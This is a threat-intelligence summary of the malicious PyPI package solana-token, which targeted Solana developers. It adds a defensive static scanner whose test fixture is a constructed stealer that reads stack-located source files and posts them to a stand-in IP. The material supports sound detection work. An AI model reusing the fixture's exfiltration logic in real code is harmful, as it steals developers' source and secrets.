The article highlights the continued rise of software supply chain attacks targeting cryptocurrency projects, exemplified by a malicious PyPI package named solana-token that steals developer secrets and source code. These attacks specifically threaten blockchain development environments and cryptocurrency infrastructure, particularly impacting the Solana platform and its developer ecosystem. #Solana #PyPI
Keypoints
- ReversingLabs reported 23 distinct malicious supply chain campaigns targeting cryptocurrency in 2024, with new campaigns continuing in 2025.
- The malicious PyPI package solana-token impersonated a utility for Solana blockchain developers and was downloaded over 600 times before removal.
- Solana-token contained code that exfiltrated application source code and developer secrets to a hard-coded IP address, enabling theft of crypto-related secrets.
- The package exhibited behaviors that ReversingLabs flags as suspicious in a PyPI package: contacting a host by IP address rather than by hostname, connecting to non-standard ports, and reading files to collect sensitive data.
- Solana-token reused the name of a malicious package that had previously been removed. PyPI reserves a name only when its administrators remove the package; a name freed by an author-initiated removal can be registered again, and the new upload exploited that gap.
- ReversingLabs notified PyPI administrators who removed the latest solana-token package to prevent further uploads under that name.
- Indicators of Compromise include specific versions (0.0.1 and 0.0.2) of solana-token and corresponding SHA1 hashes linked to the malicious package.
- This incident demonstrates the ongoing threat supply chain attacks pose to cryptocurrency development and underscores the need for vigilant monitoring.
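The behaviors listed above (IP-literal URLs, non-standard ports, file reads, and the execution-stack walk noted under Data Staged) can be screened for statically before a package is installed. The following is an added example, not ReversingLabs' tooling and not the solana-token code; the two package snippets it scans are constructed for illustration, and 203.0.113.10 is a documentation address standing in for the undisclosed hard-coded IP.

```python
"""Static triage of Python package source for infostealer-style behaviour.

Heuristics: string literals with URLs whose host is an IP address or whose port
is not 80/443, calls that read files, calls that walk the Python execution
stack, and calls that open outbound connections.  Assumption: anything outside
STANDARD_PORTS is treated as non-standard.
"""
import ast
import ipaddress
import re
from urllib.parse import urlparse

STANDARD_PORTS = {80, 443}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

FILE_READ_CALLS = {"open", "os.listdir", "os.walk", "os.scandir", "glob.glob"}
FILE_READ_ATTRS = {"read_text", "read_bytes"}          # pathlib-style reads
STACK_CALLS = {"inspect.stack", "inspect.currentframe", "sys._getframe"}
OUTBOUND_CALLS = {"requests.post", "requests.get", "urllib.request.urlopen",
                  "socket.create_connection", "http.client.HTTPConnection"}


def _dotted_name(node):
    """Rebuild 'a.b.c' from an Attribute/Name chain; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _url_findings(url, lineno):
    """Flag an IP-literal host and/or a non-standard port in one URL."""
    out = []
    parsed = urlparse(url)
    host = parsed.hostname
    try:
        port = parsed.port
    except ValueError:                       # malformed port such as ":abc"
        port = None
    if host:
        try:
            ipaddress.ip_address(host)
            out.append(("ip_literal_url", lineno, url))
        except ValueError:
            pass                             # ordinary hostname
    if port is None:
        port = 443 if parsed.scheme == "https" else 80
    if port not in STANDARD_PORTS:
        out.append(("non_standard_port", lineno, f"{host}:{port}"))
    return out


def scan_source(src, filename="<package>"):
    """Return (kind, lineno, detail) tuples for every heuristic hit in src."""
    findings = []
    for node in ast.walk(ast.parse(src, filename)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                findings.extend(_url_findings(url, node.lineno))
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name is None:
                continue
            if name in FILE_READ_CALLS or name.rsplit(".", 1)[-1] in FILE_READ_ATTRS:
                findings.append(("file_read", node.lineno, name))
            elif name in STACK_CALLS:
                findings.append(("stack_inspection", node.lineno, name))
            elif name in OUTBOUND_CALLS:
                findings.append(("outbound_call", node.lineno, name))
            elif name.endswith(".connect") and node.args and isinstance(node.args[0], ast.Tuple):
                # raw socket connect((host, port)) with a literal tuple
                elts = node.args[0].elts
                if len(elts) == 2 and all(isinstance(e, ast.Constant) for e in elts):
                    findings.append(("outbound_call", node.lineno, name))
                    findings.extend(_url_findings(f"tcp://{elts[0].value}:{elts[1].value}", node.lineno))
    return findings


def triage(findings):
    """Local collection plus an outbound channel is the infostealer pattern."""
    kinds = {kind for kind, _, _ in findings}
    collects = bool(kinds & {"file_read", "stack_inspection"})
    exfil = bool(kinds & {"outbound_call", "ip_literal_url", "non_standard_port"})
    return {"collects_local_data": collects, "has_outbound_channel": exfil,
            "suspicious": collects and exfil}


# Constructed sample mimicking the described behaviour; 203.0.113.10 is a
# documentation address, not the real (undisclosed) hard-coded IP.
SAMPLE_SUSPICIOUS = '''
import inspect, requests

def _collect():
    frames = inspect.stack()
    paths = [f.filename for f in frames if f.filename.endswith(".py")]
    blob = ""
    for path in paths:
        with open(path) as fh:
            blob += fh.read()
    requests.post("http://203.0.113.10:8081/upload", data=blob)
'''

# Constructed benign sample: a public RPC endpoint reached by hostname over 443.
SAMPLE_BENIGN = '''
import requests

def get_slot():
    r = requests.post("https://api.mainnet-beta.solana.com",
                      json={"jsonrpc": "2.0", "id": 1, "method": "getSlot"})
    return r.json()["result"]
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        hits = scan_source(src)
        print(label, triage(hits))
        for hit in hits:
            print("  ", hit)
```

Run it against every `.py` file in an unpacked sdist or wheel before installing. The benign sample still produces an `outbound_call` hit, which is why `triage` only raises `suspicious` when a collection behavior and an outbound channel appear together; a single heuristic on its own is too noisy for packages that legitimately talk to RPC endpoints.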
MITRE Techniques
- [T1074] Data Staged – The malicious solana-token package collected and staged developer source code files before exfiltration (‘scanned the Python execution stack, then copied and exfiltrated source code…’).
- [T1041] Exfiltration Over C2 Channel – Source code and developer secrets were sent to a hard-coded IP address; addressing the host by IP rather than by name sidesteps DNS-based monitoring (‘Code containing URLs that reference a host by IP address…’).
- [T1213] Data from Information Repositories – The malware read files from the developer environment to collect secrets (‘Code that reads from files… a common feature of “infostealer” malware’); reading files on the developer's own host maps more precisely to T1005 Data from Local System.
- [T1071] Application Layer Protocol – Outbound connections were made to non-standard ports on external servers (‘Code that initiates outbound communications to non-standard ports on external servers’); the port choice itself is T1571 Non-Standard Port.
Indicators of Compromise
- [File names] Malicious PyPI package names – solana-token versions 0.0.1 and 0.0.2 targeting Solana developers.
- [File hashes] SHA1 file hashes of malicious packages – f4e1149360174b4fcf0dcc6e61898c8180324893, 0b8697f8e81956e7c0c5383806fa69630c38ad33, e07457e36bf9aab1dc2b54acd30ec8f9e5c60c84, 9719d1e076ab67a18f231889cad4b451f539ce72 linked to solana-token.
- [IP addresses] Hard-coded IP targets – Used for exfiltrating stolen data from compromised developer environments (specific IP not disclosed).
Read more: https://www.reversinglabs.com/blog/same-name-different-hack-pypi-package-targets-solana-developers